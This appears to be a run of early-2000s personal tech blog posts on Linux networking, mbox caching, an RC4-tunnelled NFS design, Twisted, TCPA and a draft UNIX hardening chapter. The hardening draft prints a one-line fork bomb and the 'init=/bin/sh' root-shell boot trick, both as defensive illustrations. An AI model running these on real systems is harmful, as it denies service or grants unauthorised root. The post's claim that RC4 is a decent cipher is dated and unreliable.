    	strcpy (ifr.ifr_name, argv[1]);
    	strcpy (ifr.ifr_newname, argv[2]);
    
    	fd = socket (PF_INET, SOCK_STREAM, 0);
    	if (fd < 0) {
    		printf ("I cannot create a normal TCP socket. It is, of course, possible "
    		"to not build your kernel with TCP/IP support, in which case you have to " 
    		"hack this utility to work you wizard you.\n");
    		return 3;
    	}
    	if (ioctl (fd, SIOCSIFNAME, &ifr) == -1) {
    		perror ("ioctl");
    		/* argv[1] is the interface being renamed; argv[0] is this program */
    		printf ("Are you root? Is %s down? Does %s even exist?\n", argv[1], 
    			argv[1]);
    		return 4;
    	}
    
    	return 0;
    }
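
    The mapping utility suggested above could be sketched roughly as follows. This is only an illustration: the mapping file format (one "MAC name" pair per line, with # comments) and the function names are my own assumptions, and it only works out which renames are needed rather than performing them.

```python
import os


def parse_mapping(text):
    """Parse lines of the form '<MAC> <name>'; '#' starts a comment (assumed format)."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        mac, name = line.split()
        mapping[mac.lower()] = name
    return mapping


def current_interfaces(sys_net="/sys/class/net"):
    """Read name -> MAC from Linux sysfs; entries without an address file are skipped."""
    result = {}
    for name in os.listdir(sys_net):
        try:
            with open(os.path.join(sys_net, name, "address")) as f:
                result[name] = f.read().strip().lower()
        except OSError:
            continue
    return result


def plan_renames(mapping, current):
    """Return [(old_name, new_name), ...] for interfaces whose MAC is in the mapping."""
    plan = []
    for old_name, mac in sorted(current.items()):
        new_name = mapping.get(mac.lower())
        if new_name and new_name != old_name:
            plan.append((old_name, new_name))
    return plan
```

    Each (old, new) pair could then be handed to if_rename. The sketch does not handle two interfaces swapping names, which would need a temporary name in between.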
    

    Still working on the Secu...

    Still working on the Secure NFS thing. Been looking at a couple of kernel patches:

    Firstly, epoll. This used to be known as /dev/epoll, but it's now a set of system calls and is merged into 2.5. Patches are on that site for 2.4.

    This is basically a replacement for the poll system call (though it is edge-triggered, not level-triggered) and, as the results on the webpage show, works much more quickly for large fd sets. I still have some worries about some multithreading issues with this, but it looks like I'm going to use it.
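
    To make the edge-triggered point concrete, here is a small sketch using Python's select.epoll wrapper (Linux only). The socket pair and the function name are just scaffolding for the demonstration; the thing to notice is that the second poll reports nothing, even though the data is still sitting unread in the buffer.

```python
import select
import socket


def edge_triggered_demo():
    """Return (events on first poll, events on second poll, data finally read)."""
    a, b = socket.socketpair()
    a.setblocking(False)
    ep = select.epoll()
    try:
        # EPOLLET asks for edge-triggered notification on this descriptor.
        ep.register(a.fileno(), select.EPOLLIN | select.EPOLLET)
        b.send(b"hello")
        first = ep.poll(1.0)   # the arrival of data is reported once
        second = ep.poll(0.1)  # no new data has arrived, so nothing is reported
        data = a.recv(4096)    # the bytes were there all along
        return len(first), len(second), data
    finally:
        ep.close()
        a.close()
        b.close()
```

    With a level-triggered interface such as poll, the second call would have reported the descriptor as readable again. This is why edge-triggered code has to drain a descriptor until it would block before waiting again.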

    Secondly, the Kernel Mode Linux patch. This runs processes in the kernel address space, making system calls much faster. Results from my computer are 286 cycles/getpid from user-land and 6 cycles/getpid from kernel-land. This would be nice to have (see below) but, unfortunately, it seems to cause random crashes in (at least) vim and xmms.

    To explain why fast system calls would be really nice, consider: My current numbers for the amount of processing I'm going to be doing is 250MB/s in 300 byte packets. That's somewhat pessimistic, but that's what I'm going on. That's about 830,000 packets/second. If a system call takes 400 cycles (the 286 figure is for getpid, other system calls do a little more work and with the TLB flushes, it's at least 400) that's 330 megacycles of system calls per second (for 1 system call per packet). But it's going to take more than one system call per packet even with funky vector IO so, basically, I'm looking at about 600 MHz just for system calls. Ouch.
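
    The arithmetic is easy to replay. The function below is just a calculator for the figures quoted above; the "two system calls per packet" case is my own stand-in for "more than one".

```python
def syscall_budget(bytes_per_sec, packet_bytes, cycles_per_syscall, syscalls_per_packet):
    """Return (packets per second, CPU cycles per second spent in system calls)."""
    packets_per_sec = bytes_per_sec / packet_bytes
    cycles_per_sec = packets_per_sec * cycles_per_syscall * syscalls_per_packet
    return packets_per_sec, cycles_per_sec


# 250MB/s in 300 byte packets at 400 cycles per system call
pps, one_call = syscall_budget(250e6, 300, 400, 1)
_, two_calls = syscall_budget(250e6, 300, 400, 2)
print("%.0f packets/s" % pps)
print("%.0f megacycles/s at 1 call per packet" % (one_call / 1e6))
print("%.0f megacycles/s at 2 calls per packet" % (two_calls / 1e6))
```

    One call per packet comes to roughly 333 megacycles a second, and two calls per packet roughly doubles that, which is where the 600 MHz ballpark comes from.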

    (I reserve the right to ridicule these numbers later)

    Caching MBoxes

    Designs for stuff. More so that I don't forget really.

    For mail servers that handle mboxes (POP/IMAP) it's a real pain when you have to parse the whole mbox every time. Especially when the mboxes are large. Especially, especially when said mboxes are NFS mounted.

    So the simple observation is that mboxes are append only and other mail clients will only change something in the middle if they are deleting a message. Thus:

    • When you parse an mbox, cache what information you need (like the length and seek position of each message) and store it. Also store an MD5 of the first n bytes of the last message. (n should be big enough to cover the headers that mail servers insert that contain uniqueids)
    • When you open an mbox, check to see if the cache file is more recent.
      • If it is, just load it.
      • Otherwise, check to see if the MD5 sum still matches.
        • If it doesn't then a message has been deleted. Hopefully people will generally only use one mail client so messages won't be deleted from the mbox by other clients too often. So just reparse the mbox (and cache the result, of course)
        • If the MD5 still matches then you only need to parse from the last known place in the mbox to get the new messages.
    • When you delete messages `yourself' (e.g. a DELE or EXPUNGE command) then you can update the cache to save reparsing next time.
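
    The steps above can be sketched in Python. This is not the actual implementation (that one is a C module), just an illustration of the checks. The JSON cache format, the 512 byte prefix and the function names are assumptions, and the parser naively treats any line starting with "From " as a message boundary.

```python
import hashlib
import json
import os

N_BYTES = 512  # assumed prefix size, meant to cover the unique-id headers


def parse_mbox(path, start=0):
    """Return [(offset, length), ...] for messages found from byte `start` onwards."""
    messages, offset, msg_start = [], start, None
    with open(path, "rb") as f:
        f.seek(start)
        for line in f:
            if line.startswith(b"From "):
                if msg_start is not None:
                    messages.append((msg_start, offset - msg_start))
                msg_start = offset
            offset += len(line)
    if msg_start is not None:
        messages.append((msg_start, offset - msg_start))
    return messages


def prefix_md5(path, offset, length):
    """MD5 of the first N_BYTES (or fewer) of the message at `offset`."""
    with open(path, "rb") as f:
        f.seek(offset)
        return hashlib.md5(f.read(min(length, N_BYTES))).hexdigest()


def save_index(mbox_path, cache_path, messages):
    md5 = prefix_md5(mbox_path, *messages[-1]) if messages else None
    with open(cache_path, "w") as f:
        json.dump({"messages": messages, "md5": md5}, f)


def load_index(mbox_path, cache_path):
    if os.path.exists(cache_path):
        with open(cache_path) as f:
            cache = json.load(f)
        known = [tuple(m) for m in cache["messages"]]
        # Cache strictly newer than the mbox: just load it.
        if os.path.getmtime(cache_path) > os.path.getmtime(mbox_path):
            return known
        if known:
            last_off, last_len = known[-1]
            end = last_off + last_len
            # Last message still in place: only the appended tail needs parsing.
            if (os.path.getsize(mbox_path) >= end
                    and prefix_md5(mbox_path, last_off, last_len) == cache["md5"]):
                messages = known + parse_mbox(mbox_path, end)
                save_index(mbox_path, cache_path, messages)
                return messages
    # No cache, or something was deleted: reparse everything and cache the result.
    messages = parse_mbox(mbox_path)
    save_index(mbox_path, cache_path, messages)
    return messages
```

    The comparison is deliberately "strictly newer" so that a cache and an mbox written within the same timestamp tick fall through to the MD5 check instead of being trusted blindly.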

    The above design is pretty much implemented and has a POP3 server wrapped around it. It still needs a fair amount of work tidying it up but I might stick it up here at some point. It was going to be an IMAP4 server, but having seen the IMAP protocol I don't think that's going to happen.

    Secure NFS

    NFS is generally pretty delicate. And while other projects aim to fix it properly I'm going to leave it well alone.

    So, the general design at the moment is to put a box (call it bastion) in front of the NFS server (call it falcon) that handles all the traffic for it. The clients use a tuntap to direct NFS traffic down an RC4 encrypted TCP tunnel to bastion. Bastion then decrypts it and sends the packets on to falcon, which is none the wiser.

    • I use RC4 because bastion is going to be doing a lot of decryption and RC4 is fast. The network is reasonably secure from sniffing and RC4 is still a decent algorithm.
    • Some security comes from the fact that you have to have a valid secret key for bastion before you can talk to the NFS server. Thus you cannot just plug a laptop into the wall, you at least have to get a key from a valid client.
    • Hiding the key on the client is a real pain. A TCPA motherboard would help a lot, but we don't have any. Basically, keys are going to be compromised.
    • Bastion can intercept NFS mount packets and only let pass ones which it considers valid. This allows user-level authentication but the details are still to be worked out. Possibly a wrapper around PAM and SSH would manage most of the details.
    • At the moment, it's wide open so anything is raising the bar at least.
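
    For reference, RC4 itself is tiny, which is part of why it is fast. The following is a plain textbook rendering of the cipher in Python, not the tunnel code (which would be C). It is here only to show how little work there is per byte.

```python
def rc4(key, data):
    """Encrypt or decrypt `data` (bytes) with `key` (bytes); RC4 is its own inverse."""
    # Key scheduling: permute the 256-byte state according to the key.
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]

    # Keystream generation: one swap and one lookup per byte, XORed into the data.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)
```

    Because encryption is just an XOR with the keystream, a key must never be reused for two streams, so a real tunnel would need a fresh key (or key plus nonce) per connection.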

    The Salmon Of Doubt

    I swear when I came here that I intended to do some work. I really did! Look, there's a problem sheet to prove it. (there's also an empty pack of Munchies, which I don't remember eating but I suppose that I must have because it was full 20 minutes ago.)

    But alas, Waterstones are finally selling the paperback edition of The Salmon Of Doubt and my spotting and subsequent purchase of the aforementioned book is the current reason for the lack of work and, I suspect, will continue being so until I finish it.

    "Why, ", you might ask, "has such an Adams fan not obtained himself a copy of this work of art before?". Well, the hardback edition was £18. Which isn't really a lot and, in my school days, would not even have been an item of note on my monthly book expenditure. But being the poor student that I now find myself, living in the centre of a city that is, by all accounts, extremely expensive; £18 seems a lot of money. Every time I saw the book on the shelf I could never quite justify the cost.

    Thankfully, I now can. And I now need to finish the damn thing so that I can do the work I need to do for Monday!

    Kasparov vs Deep Junior e...

    Twisted Python

    Twisted describes itself as "a framework, written in Python, for writing networked applications". You can browse the documentation to your heart's delight, but I'll take you through the (small) code for doing a POP3 server.

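    from twisted.internet import reactor
    from twisted.internet.protocol import Factory
    from twisted.protocols.basic import LineReceiver
    
    class POP3(LineReceiver):
    	# Twisted calls connectionMade once the connection is established
    	def connectionMade (self):
    		self.transport.write (b"+OK POP3 Ready\r\n")
    	# Called once per complete line, with the delimiter stripped
    	def lineReceived(self, line):
    		...
    
    factory = Factory ()
    factory.protocol = POP3
    
    reactor.listenTCP (8007, factory)
    reactor.run ()

    And that's all. Since POP3 is purely a line-based protocol we can subclass the LineReceiver which handles all the buffering for us. The code is pretty self-explanatory.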

    Twisted works as an async core and, as such, your functions cannot block (say, reading a large mbox). In these cases, you use Twisted's threading functions:

    
    	def command_RETR (self, parts):
    		# assumes parts is the split command line, e.g. ["RETR", "3"]
    		n = int (parts[1])
    		reactor.callInThread (self.RETR_worker, n, -1)
    	def RETR_worker (self, n, top_lines):
    		ret = cStringIO.StringIO ()
    		n = self.mbox.message_numbers_get (n)
    		...

    Twisted also offers very nice objects for callbacks when a thread function returns a value.

    Twisted provides pretty much everything you could ask for in a networking framework and more besides. Just look at the list of modules in the API reference.

    Caching IMAP

    As I'm sure some people have noticed (except those on RSS feeds) I've trimmed the header of the site on the advice of Etienne because the top post ended up too far down. Thanks Etienne.

    The scripts which generate this site really need updating too. One feature I would like to add is the ability to view all the blog content relating to a topic. This requires that I go and tag all my past entries, but there aren't too many of those.

    In other news, the local LUG held their InstallFest yesterday which, by all accounts, went pretty well. Debian (3.0 with some sid stuff like KDE3.1) was the default install, though some people opted for SuSE 8.1 instead. I think we only trashed one hard drive with Partition Magic.

    Building on an idea from one of the CSG people I've half implemented an IMAP server which does caching of an mbox. Email here is all mbox format for a number of hard-to-change reasons and the current uw-crap server parses the whole thing every time. By keeping a cache of the structure you can speed things up a lot as the mboxes are over NFS. Fast deleting is a pain, but doable.

    However, IMAP is evil (as documented below) and I can't really be bothered to finish the protocol implementation. The interesting bits are done and I might put a POP interface on it and stick it on IV.

    Twisted

    The server is built in Twisted Python which is a really nice framework. I'll write something about this soon. (the mbox hackery is a C module, however)

    In the meantime, I'm looking at securing NFS.

    To the tune of 'If You're...

    To the tune of 'If You're Happy And You Know It'
    All together now.......
    
    If you cannot find Osama, bomb Iraq.
    If the markets are a drama, bomb Iraq.
    If the terrorists are frisky,
    Pakistan is looking shifty,
    North Korea is too risky,
    Bomb Iraq.
    
    If we have no allies with us, bomb Iraq.
    If we think that someone's dissed us, bomb Iraq.
    So to hell with the inspections,
    Let's look tough for the elections,
    Close your mind and take directions,
    Bomb Iraq.
    
    It's pre-emptive non-aggression, bomb Iraq.
    To prevent this mass destruction, bomb Iraq.
    They've got weapons we can't see,
    And that's all the proof we need,
    If they're not there, they must be,
    Bomb Iraq.
    
    If you never were elected, bomb Iraq.
    If your mood is quite dejected, bomb Iraq.
    If you think Saddam's gone mad,
    With the weapons that he had,
    And he tried to kill your dad,
    Bomb Iraq.
    
    If corporate fraud is growin', bomb Iraq.
    If your ties to it are showin', bomb Iraq.
    If your politics are sleazy,
    And hiding that ain't easy,
    And your manhood's getting queasy,
    Bomb Iraq.
    
    Fall in line and follow orders, bomb Iraq.
    For our might knows not our borders, bomb Iraq.
    Disagree? We'll call it treason,
    Let's make war not love this season,
    Even if we have no reason,
    Bomb Iraq.
    

    Below is the text of an e...

    Below is the text of an email I sent to the p2p-hackers list:

    On Mon, Feb 03, 2003 at 12:04:34AM -0500, Seth Johnson wrote:
    > Tell American Megatrends and Transmeta not to make chips
    > that let others control your computer!
    
    This is sensationalist and wrong. TCPA chips do not let other people `control
    your computer', in fact the abilities of the TCPA chip are rather limited.
    It would help if you read the spec for TCPA (http://www.trustedcomputing.org/)
    before posting such stuff, but I will admit that the TCPA spec is a wonderful
    example of exactly how not to write a spec. I'm sure much of the 
    misunderstanding of TCPA is due to the poor quality of this document.
    
    Also see
    http://www.research.ibm.com/gsal/tcpa/
    for a wonderful work about TCPA which may allay some of your fears.
    
    > Palladium and TCPA would hardwire your home computer so that
    > these four entities and their partners would be able to run
    > processes on your computer, entirely outside your control,
    > indeed, without your knowledge.
    
    If you are running Windows this pretty much happens already.
    
    > The mechanics are as follows: only code that has been signed
    > with a special Microsoft provided key will run. Microsoft
    > will retain at all times the power to revoke any other
    > entity's keys. In particular, no operating system will be
    > able to boot without a key from Microsoft. So if Palladium
    > is forced into every home computer, there will be no more
    > free software. 
    
    Total crap. If M$ wish to implement code signing in Windows they can do that
    with or without TCPA. TCPA allows you to seal data and only unseal it when
    booted in the same configuration. It also allows you to `prove' to another
    party that you are running a given configuration (with a number of assumptions)
    "The TCPA chip doesn't execute anything. It accepts request data, and replies
    with response data. The TCPA chip does not and cannot control execution!"
    (IBM paper). *TCPA chips do not prevent free-software running on the computer*
    
    > Microsoft will be able to spy on each and every keystroke,
    > and mouse movement, and send encrypted messages from your
    > machine to Microsoft headquarters. Microsoft will also be
    > able to examine every file on your system.
    
    As they can (and, by some accounts, do) currently.
    
    > Your encryption
    > programs will not work against Microsoft, or any other
    > entities which have full power keys from Microsoft. 
    
    Utter crap again. TCPA does not alter mathematical reality. Boot Linux
    and encrypt all you like.
    
    > There are two reasons most people will not be able to escape
    > the All Seeing Eye and Invisible Hand of Palladium. 
    
    You are mixing up Palladium and TCPA. And we don't even have details on
    Palladium yet.
    
    > Once Microsoft and Intel have forced Palladiated hardware
    > into every personal computer, it will be impossible to run a
    > free OS. 
    
    Rubbish. See above.
    
    Now, TCPA does allow some nasty things to happen. See
    http://www.trustedcomputing.org/docs/TCPA_first_WP.pdf
    for an example of `content providers' using TCPA to only trust a computer
    running a given OS. But, personally, I would like a TCPA system. That way I
    can encrypt my filesystem and store the key in the TPM; which would only
    decrypt it when my kernel was booted. As a crypto junkie that appeals quite a
    lot.
    

    IMAP

    I've had cause to read the IMAP RFC rather a lot recently and it's a pretty good example of what not to do when designing a protocol.

    For example, in the FETCH command:

    ALL: Macro equivalent to: (FLAGS INTERNALDATE RFC822.SIZE ENVELOPE)

    Do they really think that people are going to be using raw IMAP with a telnet client so often that these shortcuts are going to be useful? It's not exactly damaging, it's just stupid and a clear indication that the designers didn't understand protocol design.

    The point of protocol design isn't just to get all the required functionality in there. It's to do that with the minimum number of primitives.

    Now sometimes those primitives are pretty large and performance dictates that they shouldn't be broken down any further. But IMAP certainly cannot claim that it has hit that barrier.

    Also, IMAP servers are supposed to parse MIME and present a breakdown to the client, the point being that the client doesn't have to fetch the whole message. Desirable functionality, but commands for fetching and substring searching in a byte range would allow clients to do that and not burden the server with the very-much-client-side-total-mess that is MIME. And this type of thing litters the IMAP protocol.

    Now hosted on Imperial se...

    Now hosted on Imperial servers. Cheers CSG.

    Goodbye metis...

    As of this weekend, metis.imperialviolet.org will cease to be. Physically it will remain, but behind a NAT, ticking away in quiet invisibility.

    Specified and built by myself it has been running pretty much flawlessly since inception. Downtime was generally not its fault:

    • Powercuts (many of these)
    • Upstream network failures
    • Upstream's promises of a static IP address failing (many of these)
    • PSU fan failure causing it to overheat and die every few hours (I guess you could call that its fault)
    • Rats pissing in the PSU and shorting it out (I kid you not)

    Goodbye, good server.

    (this may well mean that imperialviolet as a website will be down over the weekend. Email will continue to work)

    Theo

    Note to self: Keep a GRUB boot disk about because the bootloader is never on the disk you think it is

    Theo Hong is a fellow Freeneter whom I first met at the first O'Reilly P2P conference. He was also nice enough to show me round Imperial last year when I was considering universities. I thought he had headed off to Boston at the beginning of the academic year but someone remarked today that he was still here. And indeed he is! Woo!

    I was a technical reviewe...

    I was a technical reviewer for UNIX Power Tools (3rd Ed) and, while cleaning out an old drive today, I found the sketch I did for the security chapter. For those who own the book, I thought that chapter 48 needed serious work and did a sketch to show what I would have liked in its place. Anyway, the editor disagreed so I might as well post that sketch here.

    * Attack Models
    
    Any discussion of security must first at least give a passing nod to the idea
    of who your attacker is. The decisions you make concerning security
    will largely be based on how well funded, motivated and powerful your
    attacker is. The security needs of government computers are very
    different to the Amstrad that someone occasionally uses to type a
    letter.
    
    For a computer connected to the Internet the profile of your average
    attacker will be a mostly unmotivated, largely unskilled individual
    (unless you have special reason to think you are a high profile
    target). Unfortunately there are many attackers on the Internet using
    automated tools which exploit vulnerable software automatically. For
    this reason all networked computers should be secured against this
    kind of threat and prepared in the event of a breach.
    
    * Least-Privilege
    
    The principle of least-privilege states that something should have the
    ability to carry out its task and no more. This seems like a simple
    idea and easily obtainable but in practice is often violated.
    
    All processes run with a UID, GID and are members of certain
    groups. For example when you (say, UID=1000) run /bin/ls a process is
    created which inherits your UID, GID and groups and the image of
    /bin/ls is loaded and executed. The ls process may then do anything
    which you could do. This is an example of a violation of least
    privilege as there is no need, for example, for ls to be able to
    alter any files.
    
    No security model is perfect and we have to live with the limitations of
    the UNIX security model on UNIX based systems. 
    
    * Physical Security
    
    A comprehensive coverage of this topic is outside the scope of this book, but
    if you cannot secure the physical computer then no amount of clever software
    is going to help. Ideally the computer will be in a locked room with
    dedicated power and air conditioning but, unless you are cohosting,
    this is very unlikely. Most physical situations are far from ideal and
    you should always keep this in the back of your mind.
    
    You may wish to read Security Engineering by R. Anderson for an interesting
    and detailed coverage of physical security (among other topics).
    
    ** Booting Security
    
    The first vulnerable point is before the operating system has even
    loaded. Most computers will boot from a floppy disk first, by
    default. It requires physical access, but if an attacker can boot off
    their own kernel they have free rein over the system. At the very
    least you should change the booting options to only boot from the hard disk
    and set a BIOS password. Remember that a BIOS password can usually be
    cleared by shorting a jumper on the motherboard, however.
    
    The next stage to be concerned with is the boot loader which actually
    loads a kernel from the disk and runs it. At this point an attacker may
    be able to alter the boot sequence and bypass normal protections. For
    example, passing the option "init=/bin/sh" to a Linux kernel will
    cause it to drop to a root shell after the kernel has loaded.
    
    Boot loaders vary with the flavour of UNIX; investigate the man-page
    for yours to find what security features it has.
    
    * Unneeded services
    
    Many default installs are guilty of running far too many unneeded
    services by default. These generally remain unused and serve no
    purpose except to provide more possible entry points for an attacker.
    
    The first place to look is in /etc/inetd.conf. As a general rule of
    thumb you should comment out every service which you don't know that
    you require. Once you have done this (and every time you edit
    inetd.conf) you should send a SIGHUP to the inetd process.
    
    Often inetd will not be running any services in which case you can
    disable it.
    
    You should also check for other services with `ps auxw`,
    `netstat -l` and `lsof -i`. These services will have been started by
    your init scripts and you should consult the documentation for your
    system for disabling them.
    
    * Securing needed services
    
    Most systems will have a number of services which need to be running
    in order to function. Given that they are a necessity we must now
    turn to making them as secure as possible.
    
    The first question is which software are you going to use to perform
    the required tasks. Many services have a de-facto daemon that is
    usually installed to provide them. However, these de-facto choices
    often are not the most secure and you may wish to investigate others.
    
    For example, sendmail is the de-facto daemon to provide email
    services. However, it has a long history of security problems and a
    fundamentally bad design which violates least-privilege. If you need
    some advanced mail handling capability it might be that only sendmail
    will do. However, in nearly all cases packages such as qmail and
    postfix will do the job and these have been designed from the ground up with
    security in mind.
    
    ** Dropping root
    
    Many daemons will give you the option of switching to a non-root user
    once they have started up (setuid). This gives it the ability to perform some root
    tasks at startup and then prevent itself from issuing any more. If the
    server is compromised in operation the attacker gains control of a
    process running as a dummy user - much less damaging than a root compromise.
    For example a daemon may bind to a low numbered port (which requires
    root privileges) and then switch to a non-root user while retaining
    the socket in its file descriptor table.
    
    When offered you should always use a setuid option. You should,
    however, create a different user for each service. Many systems have
    an account called nobody that services often run under. But if nobody
    owns processes (and possibly files) then nobody is somebody! By
    confining each process to its own user you contain the service.
    
    * Chroot and jails
    
    The chroot system call changes the root directory for a
    process. Normally the root directory for a process is the system's root
    directory with the path "/". However by chrooting a process you can
    confine a process's view of the file-system to a given subdirectory.
    
    Note: After a chroot the current directory of a process may still be
    outside the new root file-system.
    
    ** Example chrooting Apache
    
    There are 2 stages to chrooting a daemon. The first is to reconfigure
    the daemon for the new paths. The second is to setup a minimal
    environment for the daemon to run in.
    
    For this example I'll be configuring apache in a temporary directory
    in my home. For a real server you'll want to put it in a different
    directory (I use /jail).
    
    This example uses the chroot system call. Your system may provide
    other, similar calls such as jail. See the man pages for these calls.
    
    *** Building Apache
    
    Download an apache tarball from your favourite mirror and expand
    it. I'm using version 1.3.26 here.
    
    % cd ~/src
    % tar xzf apache_1.3.26.tar.gz
    % cd apache_1.3.26
    % ./configure --prefix=/home/agl/tmp/apache
    % make
    % make install
    
    You may wish to add other options to the configure command line to
    enable your favourite mod_foo.
    
    Now we reconfigure apache to expect the different path names. Since
    /home/agl/tmp/apache is going to be the new root apache will see paths
    like /htdocs.
    
    Apache's startup script is a shell script so we are going to need a
    shell in our root to run it. Since this is a Linux box I'm going to be
    using bash. If you have a real Bourne shell you may wish to use that instead.
    
    % cd ~/tmp/apache
    % vim bin/apachectl
    
    We need to change 3 lines in this file and add one. Change the shebang
    line to expect a shell in the root directory and a couple of the
    paths. We also add a -f option to httpd to tell it where its config
    file is.
    
    #!/bin/sh -> #!/bash
    PIDFILE=/home/agl/tmp/apache/logs/httpd.pid -> PIDFILE=/logs/httpd.pid
    HTTPD=/home/agl/tmp/apache/bin/httpd -> HTTPD="/bin/httpd -f /conf/httpd.conf"
    
    Now, just before the line which reads "ERROR=0" insert a line reading
    "cd /". This sets the current directory to be inside the jail.
    
    We need to remove the string "/home/agl/tmp/apache" every time it
    appears in conf/httpd.conf. Use your favourite text editor, or do
    
    % vim conf/httpd.conf
    :%s!/home/agl/tmp/apache!!g
    
    You also need to find the User and Group directives in this file and
    change them to read
    
    User apache
    Group apache
    
    Now we come to the second part of setting up a chroot jail - creating
    the environment. Foremost in our mind are the user and group names we
    just told apache to use. It needs to be able to turn these into real
    UIDs and GIDs. For this it needs an /etc/passwd and /etc/group in the
    jail. However, I recommend that you also setup a user and group in the
    main passwd and group files with a sensible name so processes outside
    the jail can make sense of the httpd processes inside (for example, ps).
    
    In etc/passwd put
    
    apache:x:65534:65534:nobody:/home:/bin/sh
    
    and in etc/group put
    
    apache:x:65534:
    
    Now set the permissions
    
    % chmod 664 etc/passwd etc/group
    
    All modern systems support some kind of runtime linking of
    libraries. In order to run apache and bash we need to copy the
    libraries they require. These requirements vary greatly but the ldd
    command will generally reveal all the requirements.
    
    % ldd bin/httpd
    	libm.so.6 => /lib/libm.so.6 (0x00136000)
    	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00158000)
    	libc.so.6 => /lib/libc.so.6 (0x00185000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
    % mkdir lib
    % cd lib
    % cp /lib/ld-linux.so.2 .
    % cp /lib/libc.so.6 .
    % cp /lib/libcrypt.so.1 .
    % cp /lib/libm.so.6 .
    % ldd /bin/bash
    	libncurses.so.5 => /lib/libncurses.so.5 (0x00136000)
    	libdl.so.2 => /lib/libdl.so.2 (0x00174000)
    	libc.so.6 => /lib/libc.so.6 (0x00178000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
    % cp /lib/libncurses.so.5 .
    % cp /lib/libdl.so.2 .
    % cp /lib/libnss_files.so.2 .
    % cd ..
    
    The last library isn't mentioned by any ldd listing, but glibc loads
    it on the fly to read /etc/passwd and /etc/group. Now we copy bash and
    cat into the jail (apachectl uses cat) and create /dev/null.
    
    % cp /bin/bash .
    % cp /bin/cat bin
    % mkdir dev
    % su
    # cp -a /dev/null dev
    
    That's the environment completed. Apache can be run by
    
    # chroot . ./bin/apachectl start
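
    The library-copying step in the example above gets tedious for larger binaries, so it can be scripted. The helper below is a sketch of my own, not part of the original chapter draft. It only parses ldd output into a list of paths to copy, and it will not find libraries that are loaded on the fly, such as libnss_files.

```python
def libs_from_ldd(output):
    """Extract absolute library paths from the text printed by ldd."""
    paths = []
    for line in output.splitlines():
        fields = line.split()
        if "=>" in fields:
            # "libm.so.6 => /lib/libm.so.6 (0x00136000)"
            idx = fields.index("=>")
            if idx + 1 < len(fields) and fields[idx + 1].startswith("/"):
                paths.append(fields[idx + 1])
        elif fields and fields[0].startswith("/"):
            # Some ldd versions print the loader as a bare path with no "=>"
            paths.append(fields[0])
    return paths
```

    Feeding it the output of ldd for each binary going into the jail gives the list of files to copy into lib.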
    
    * Limits
    
    Resource limits are required on any secure system - especially
    multi-user systems. Without them (and they are often disabled by
    default) users may use up so many resources that critical systems are
    unable to function and service is denied to others.
    
    A simple example is a fork bomb. The following line of C code will
    bring systems without resource limits to their knees - sometimes
    requiring a power cycle to recover.
    
    	  for (;;) fork ();
    
    There are two main types of resource limit - quota and limits.conf
    
    ** Limits.conf
    
    This file describes the limits placed on users for resources such as
    the process table and memory. The number of rules in this file should
    be kept to a minimum. Limits should be set on whole groups to keep the
    file manageable.
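
    Underneath, these limits end up as per-process resource limits set with the setrlimit call, and a process can inspect or lower its own. The Python sketch below (my addition, with a hypothetical helper name) lowers a soft limit. Applied to RLIMIT_NPROC before running untrusted code, it is the kind of cap that stops the fork bomb above.

```python
import resource


def cap_soft_limit(which, ceiling):
    """Lower the soft limit for `which` to at most `ceiling`; never raises it."""
    soft, hard = resource.getrlimit(which)
    # RLIM_INFINITY means "no limit", so only finite values take part in min().
    candidates = [ceiling]
    if soft != resource.RLIM_INFINITY:
        candidates.append(soft)
    if hard != resource.RLIM_INFINITY:
        candidates.append(hard)
    new_soft = min(candidates)
    resource.setrlimit(which, (new_soft, hard))
    return new_soft


# Example: allow this user at most 256 processes from this process onwards.
# cap_soft_limit(resource.RLIMIT_NPROC, 256)
```

    Lowering a soft limit needs no privileges; raising the hard limit again does, which is what makes the limit stick for ordinary users.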
    
    ** Quota
    
    Quota controls the amount of disk space that users and groups may
    use. Quota systems vary widely between UNIXes and you may have to
    consult the documentation for your system for the specific commands
    required.
    
    Generally quota systems allow the restriction of blocks and
    inodes. Blocks are 512 or 1024 byte chunks and limiting this number
    limits the actual amount of data that a user may own. Inodes are
    structures that describe files and many file-systems have hard limits
    on the number available. Unless you limit them a user may be able to
    fill the inode table and prevent new files being created.
    
    * Security at more abstract levels
    
    There are many social aspects of security that also need to be considered
    by a poor-overworked sys admin. Much of this area is outside the scope of
    a book such as this.
    
    Much has been written about the security of
    passwords, or rather the lack of, but still insecure passwords remain.  
    Unless your users are security-savvy you can be sure that most of their
    passwords will be simple to guess.
    
    Several options present themselves, from seeking to educate users, to setting
    up cracklib, to providing a version of passwd which only gives out random
    passwords.
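
    As a rough illustration of the last option, a generator for random passwords takes only a few lines of Python. The alphabet and default length here are arbitrary choices of mine. The one point that matters is drawing from the operating system's secure random source, which the secrets module does.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # assumed character set


def random_password(length=12):
    """Return a password of `length` characters drawn uniformly from ALPHABET."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
```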
    
    Social Engineering is another method for attackers to gain access to a 
    system and is very hard to defend against. It generally involves tricking
    users into revealing passwords or running Trojan programs. There are no good
    technical measures against this family of attacks. They require user
    education and strict guidelines.
    

    Well, it seems that my previous...

    Well, it seems that my previous comments about TCPA not being able to secure boot were true, but this work from IBM suggests that it can provide a primitive that says "only decrypt this on a given boot config".

    Now, a boot config (my name) is defined loosely in the TCPA specs (site seems to be down right now, maybe MsSQL worm) and I would want to see exactly what it is hashing before I use it. But I can see many useful applications of this. For one, encrypt the hard drive and store the decryption key in the TCPA chip. That way you get seamless boots, but you cannot root the box with a floppy disk. I can think of a number of times that function would have been nice. So I think I would be quite happy to have a TCPA motherboard and I want to see lots of neat uses for them.

    More on Proof by Contradiction

    Ok, after talking with one of the maths people here about this, it boils down to this: proof by contradiction works only if you accept A∨¬A. That's called the law of the excluded middle.

